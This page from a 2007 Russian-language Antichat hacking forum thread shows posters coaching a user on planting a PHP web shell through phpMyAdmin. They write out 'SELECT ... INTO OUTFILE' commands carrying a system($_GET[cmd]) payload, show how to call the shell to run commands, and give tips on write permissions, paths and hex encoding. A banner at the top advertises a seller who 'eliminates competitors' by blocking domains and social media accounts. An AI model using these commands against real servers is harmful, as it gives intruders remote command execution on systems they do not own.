phpMyAdmin

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
phpMyAdmin

Страница 3 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#21

26.12.2007, 17:16

Ershik

Постоянный

Регистрация: 07.11.2007

Сообщений: 392

С нами: 9741777

Репутация: 100

Обратил. Дальше что? Должен появиться веб шелл по адресе http://sait.ru/phpBB/index.php ? Пробовал. Его там нет.

#22

26.12.2007, 17:22

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

С нами: 9976706

Репутация: 1934

Во-первых должны быть права на запись. Во-вторых узнай полный путь до этой директории.
//локалхост

Код:

select "<?system($_GET[cmd])?>" into outfile '/home/localhost/www/shell.php';

Потом обращяешься к шеллу так http://localhost/shell.php?cmd=ls -la

Последний раз редактировалось AFoST; 27.12.2007 в 01:11.. Причина: убрал ковычки 'cmd'

#23

26.12.2007, 17:24

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

не надо там в кавычки ничего обрамлять
переведи этот пшп код в хекс например, ты вообще увеерн что у тебя права есть на запись файлов?

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#24

26.12.2007, 23:11

~~Elekt~~

Banned

Регистрация: 05.12.2005

Сообщений: 982

С нами: 10752806

Репутация: 1202

Цитата:

Сообщение от Spyder

хм
Средствами SQL например
select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php'

по синтаксису sql необходимым условием является:
~ указание существующей таблицы
~ абсолютный путь к файлу
~ обрамление ковычками абсолютного пути к файлу, что как следствие требует magic_quotes=OFF либо stripslashes запроса

.. и тот кто реально хоть раз грузил так шелл, должен был это знать...

PHP код:


		
			
select '<?system($_GET)?>' from table_name_blaaaahh  into outfile '/путь/к/шеллу.php'

#25

26.12.2007, 23:31

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

Elekt, забыл код обрамить в кавычки
Я имел ввиду что надо делать так $_GET[cmd], а не так $_GET['cmd']
А вот про указание существующей таблицы - глупость
Я у себя на локалке с успехом выполнял запрос select 1 into outfile '/tmp/123.txt'

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Последний раз редактировалось Spyder; 26.12.2007 в 23:35..

Страница 3 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Кодировка в PhpMyAdmin	Ershik	PHP	10	28.12.2007 10:54
Error in simple exploit phpMyAdmin	am@tory	Уязвимости	11	12.12.2007 05:05
Как залить шелл через PhpMyAdmin?	Buga	Уязвимости CMS / форумов	15	16.02.2006 22:18
Залить remview.php через phpMyAdmin	Grom	PHP	8	05.02.2006 00:19
phpmyadmin	dyx	Болталка	1	27.04.2005 17:04

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход